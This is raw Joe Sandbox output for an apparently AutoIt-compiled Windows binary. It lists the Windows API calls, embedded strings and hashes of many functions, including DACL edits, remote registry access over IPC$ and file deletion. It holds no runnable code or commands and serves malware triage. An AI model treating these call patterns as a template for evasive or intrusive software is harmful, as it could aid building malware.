                                                                                                                      • Opcode Fuzzy Hash: fe57c903147e29d96215565176d6719fb07702cd460a097dd723957a95f999d3
                                                                                                                      • Instruction Fuzzy Hash: CD61F171A00214BFEB20DF65CC45FAA7BA8AB09710F104526F911EB1D1DB78ED90D764
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 003EB46D
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 003EB476
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB482
                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003EB561
                                                                                                                      • __swprintf.LIBCMT ref: 003EB591
                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 003EB5BD
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003EB63F
                                                                                                                      • SysFreeString.OLEAUT32(00000016), ref: 003EB6D1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB727
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003EB736
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 003EB772
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                      • API String ID: 3730832054-3931177956
                                                                                                                      • Opcode ID: f64da0431094d342997f3f374c15b26f80ec7669e23bde83ef33858956519643
                                                                                                                      • Instruction ID: f72d547a204f704773db24c2fb2eb1f30b6054b6caba59d83ce8a84f1628b520
                                                                                                                      • Opcode Fuzzy Hash: f64da0431094d342997f3f374c15b26f80ec7669e23bde83ef33858956519643
                                                                                                                      • Instruction Fuzzy Hash: 17C1C171A04666DBCB139F6BD484B6AF7B8FF05300F258665E4059BAC2CB74EC40DBA1
                                                                                                                      APIs
                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 003F0EFF
                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 003F0F0F
                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003F0F1B
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F0F79
                                                                                                                      • _wcscat.LIBCMT ref: 003F0F91
                                                                                                                      • _wcscat.LIBCMT ref: 003F0FA3
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003F0FB8
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0FCC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0FFE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F101F
                                                                                                                      • _wcscpy.LIBCMT ref: 003F102B
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F106A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                      • Opcode ID: 3e1e78f6972e0b8c696963fe3a51fb8cb2e52cb4cbba002d5896e9ce3e9f7924
                                                                                                                      • Instruction ID: ce0bb26c8b2e770711bfe4e90c2a60f41d66129006eed59150544349f3d16f89
                                                                                                                      • Opcode Fuzzy Hash: 3e1e78f6972e0b8c696963fe3a51fb8cb2e52cb4cbba002d5896e9ce3e9f7924
                                                                                                                      • Instruction Fuzzy Hash: E9616E725047459FC711EF24C844AABB7E8FF89310F04891EF989D7252EB31E945CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 003EDB26
                                                                                                                      • GetDriveTypeW.KERNEL32 ref: 003EDB73
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDBBB
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDBF2
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EDC20
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                      • API String ID: 2698844021-4113822522
                                                                                                                      • Opcode ID: a6b3156653558b913b656c1a614ad76965b5fc37e499625f93ec7ed26ce4316d
                                                                                                                      • Instruction ID: 06ad263c7c42183022dd7864e7bb6298e8df8fb68e1c3a1b9f0ce09456b48175
                                                                                                                      • Opcode Fuzzy Hash: a6b3156653558b913b656c1a614ad76965b5fc37e499625f93ec7ed26ce4316d
                                                                                                                      • Instruction Fuzzy Hash: 14517B715043059FC701EF10C98196BB7E8EF89758F10896DF8969B2A2DB31EE09CB52
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00414085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 003E3145
                                                                                                                      • LoadStringW.USER32(00000000,?,00414085,00000016), ref: 003E314E
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00414085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 003E3170
                                                                                                                      • LoadStringW.USER32(00000000,?,00414085,00000016), ref: 003E3173
                                                                                                                      • __swprintf.LIBCMT ref: 003E31B3
                                                                                                                      • __swprintf.LIBCMT ref: 003E31C5
                                                                                                                      • _wprintf.LIBCMT ref: 003E326C
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E3283
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                      • API String ID: 984253442-2268648507
                                                                                                                      • Opcode ID: 0e07efc26a8ae4867c9209b3fb8ca9d132caf017b83c0991a92468a6735b77e5
                                                                                                                      • Instruction ID: 00ac2763fef8396f136b4bb6d6e8ccad9368f845231e370117fb3be3e1a3198b
                                                                                                                      • Opcode Fuzzy Hash: 0e07efc26a8ae4867c9209b3fb8ca9d132caf017b83c0991a92468a6735b77e5
                                                                                                                      • Instruction Fuzzy Hash: 14416172900218BACB16FBA1DD86EEFB778EF15741F200165F601B60A2DA656F04CA61
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003ED96C
                                                                                                                      • __swprintf.LIBCMT ref: 003ED98E
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 003ED9CB
                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003ED9F0
                                                                                                                      • _memset.LIBCMT ref: 003EDA0F
                                                                                                                      • _wcsncpy.LIBCMT ref: 003EDA4B
                                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 003EDA80
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EDA8B
                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 003EDA94
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003EDA9E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                      • String ID: :$\$\??\%s
                                                                                                                      • API String ID: 2733774712-3457252023
                                                                                                                      APIs
                                                                                                                      • __wsplitpath.LIBCMT ref: 003F0C93
                                                                                                                      • _wcscat.LIBCMT ref: 003F0CAB
                                                                                                                      • _wcscat.LIBCMT ref: 003F0CBD
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 003F0CD2
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0CE6
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 003F0CFE
                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 003F0D18
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003F0D2A
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 34673085-438819550
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003DB903
                                                                                                                        • Part of subcall function 003DB8E7: GetLastError.KERNEL32(?,003DB3CB,?,?,?), ref: 003DB90D
                                                                                                                        • Part of subcall function 003DB8E7: GetProcessHeap.KERNEL32(00000008,?,?,003DB3CB,?,?,?), ref: 003DB91C
                                                                                                                        • Part of subcall function 003DB8E7: RtlAllocateHeap.NTDLL(00000000,?,003DB3CB), ref: 003DB923
                                                                                                                        • Part of subcall function 003DB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003DB93A
                                                                                                                        • Part of subcall function 003DB982: GetProcessHeap.KERNEL32(00000008,003DB3E1,00000000,00000000,?,003DB3E1,?), ref: 003DB98E
                                                                                                                        • Part of subcall function 003DB982: RtlAllocateHeap.NTDLL(00000000,?,003DB3E1), ref: 003DB995
                                                                                                                        • Part of subcall function 003DB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003DB3E1,?), ref: 003DB9A6
                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003DB5F7
                                                                                                                      • _memset.LIBCMT ref: 003DB60C
                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003DB62B
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB63C
                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 003DB679
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003DB695
                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 003DB6B2
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003DB6C1
                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DB6C8
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003DB6E9
                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 003DB6F0
                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003DB721
                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003DB747
                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003DB75B
                                                                                                                      Similarity
                                                                                                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2347767575-0
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 003FA2DD
                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003FA2E9
                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 003FA2F5
                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 003FA302
                                                                                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 003FA356
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 003FA392
                                                                                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 003FA3B6
                                                                                                                      • SelectObject.GDI32(00000006,?), ref: 003FA3BE
                                                                                                                      • DeleteObject.GDI32(?), ref: 003FA3C7
                                                                                                                      • DeleteDC.GDI32(00000006), ref: 003FA3CE
                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 003FA3D9
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EE
                                                                                                                      • API String ID: 3964851224-3503855182
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 003E809C
                                                                                                                        • Part of subcall function 003BE3A5: timeGetTime.WINMM(?,753DB400,00416163), ref: 003BE3A9
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 003E80C8
                                                                                                                      • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 003E80EC
                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 003E810E
                                                                                                                      • SetActiveWindow.USER32 ref: 003E812D
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003E813B
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 003E815A
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 003E8165
                                                                                                                      • IsWindow.USER32 ref: 003E8171
                                                                                                                      • EndDialog.USER32(00000000), ref: 003E8182
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                      • String ID: @U=u$BUTTON
                                                                                                                      • API String ID: 1194449130-2582809321
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00413C64,00000010,00000000,Bad directive syntax error,0043DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 003E32D1
                                                                                                                      • LoadStringW.USER32(00000000,?,00413C64,00000010), ref: 003E32D8
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • _wprintf.LIBCMT ref: 003E3309
                                                                                                                      • __swprintf.LIBCMT ref: 003E332B
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003E3395
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"F
                                                                                                                      • API String ID: 1506413516-210779976
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 003ED567
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 003ED589
                                                                                                                      • __swprintf.LIBCMT ref: 003ED5DC
                                                                                                                      • _wprintf.LIBCMT ref: 003ED68D
                                                                                                                      • _wprintf.LIBCMT ref: 003ED6AB
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2116804098-2391861430
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003ED37F
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003ED3A0
                                                                                                                      • __swprintf.LIBCMT ref: 003ED3F3
                                                                                                                      • _wprintf.LIBCMT ref: 003ED499
                                                                                                                      • _wprintf.LIBCMT ref: 003ED4B7
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2116804098-3420473620
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _memset.LIBCMT ref: 003DAF74
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003DAFA9
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003DAFC5
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003DAFE1
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003DB00B
                                                                                                                      • CLSIDFromString.COMBASE(?,?), ref: 003DB033
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003DB03E
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003DB043
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 003E7226
                                                                                                                      • __swprintf.LIBCMT ref: 003E7233
                                                                                                                        • Part of subcall function 003C234B: __woutput_l.LIBCMT ref: 003C23A4
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 003E725D
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003E7269
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 003E7276
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 003E7296
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 003E72A8
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 003E72B7
                                                                                                                      • LockResource.KERNEL32(?), ref: 003E72C3
                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003E7322
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                      • String ID: L6E
                                                                                                                      • API String ID: 1433390588-158042588
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003E843F
                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003E8455
                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003E8466
                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003E8478
                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003E8489
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: SendString$_memmove
                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?), ref: 0041EC32
                                                                                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 0041EC49
                                                                                                                      • GetWindowDC.USER32(?), ref: 0041EC55
                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0041EC64
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041EC76
                                                                                                                      • GetSysColor.USER32(00000005), ref: 0041EC94
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 272304278-2594219639
                                                                                                                      • Opcode ID: d17fef11ac16057012aa43a93c936f0edc557efe92b4b252710be722e3d9d356
                                                                                                                      • Instruction ID: 1e5ccd93865923f151638d65cf737c4c76776807f04549b1d547d197543bc8a1
                                                                                                                      • Opcode Fuzzy Hash: d17fef11ac16057012aa43a93c936f0edc557efe92b4b252710be722e3d9d356
                                                                                                                      • Instruction Fuzzy Hash: 96215C31A00205BFDB21AF64EC49BEABB75EB08325F904231FA26A51E1DB714992DF15
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003EC6A0: __time64.LIBCMT ref: 003EC6AA
                                                                                                                        • Part of subcall function 003A41A7: _fseek.LIBCMT ref: 003A41BF
                                                                                                                      • __wsplitpath.LIBCMT ref: 003EC96F
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcscpy.LIBCMT ref: 003EC982
                                                                                                                      • _wcscat.LIBCMT ref: 003EC995
                                                                                                                      • __wsplitpath.LIBCMT ref: 003EC9BA
                                                                                                                      • _wcscat.LIBCMT ref: 003EC9D0
                                                                                                                      • _wcscat.LIBCMT ref: 003EC9E3
                                                                                                                        • Part of subcall function 003EC6E4: _memmove.LIBCMT ref: 003EC71D
                                                                                                                        • Part of subcall function 003EC6E4: _memmove.LIBCMT ref: 003EC72C
                                                                                                                      • _wcscmp.LIBCMT ref: 003EC92A
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF49
                                                                                                                        • Part of subcall function 003ECE59: _wcscmp.LIBCMT ref: 003ECF5C
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003ECB8D
                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003ECC24
